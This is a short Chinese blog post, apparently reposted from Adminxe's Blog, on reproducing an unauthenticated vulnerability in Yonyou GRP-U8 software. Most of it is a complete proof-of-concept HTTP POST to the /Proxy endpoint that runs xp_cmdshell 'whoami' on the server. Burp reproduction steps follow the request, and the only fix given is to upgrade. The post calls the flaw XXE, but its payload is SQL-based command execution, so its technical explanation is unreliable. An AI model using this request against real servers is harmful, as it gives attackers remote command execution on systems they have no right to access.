赞
踩
用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。
无需登录
POC:
- POST /Proxy HTTP/1.1
- Content-Type: application/x-www-form-urlencoded
- User-Agent: Mozilla/4.0 (compatible; MSIE 6.0;)
- Host: localhost
- Content-Length: 341
- Connection: Keep-Alive
- Cache-Control: no-cache
-
- cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'whoami'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
burp抓包,修改url为/Proxy,在body中添加payload
升级最新版本
转载请注明:Adminxe's Blog » 用友GRP-u8 XXE 漏洞复现
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。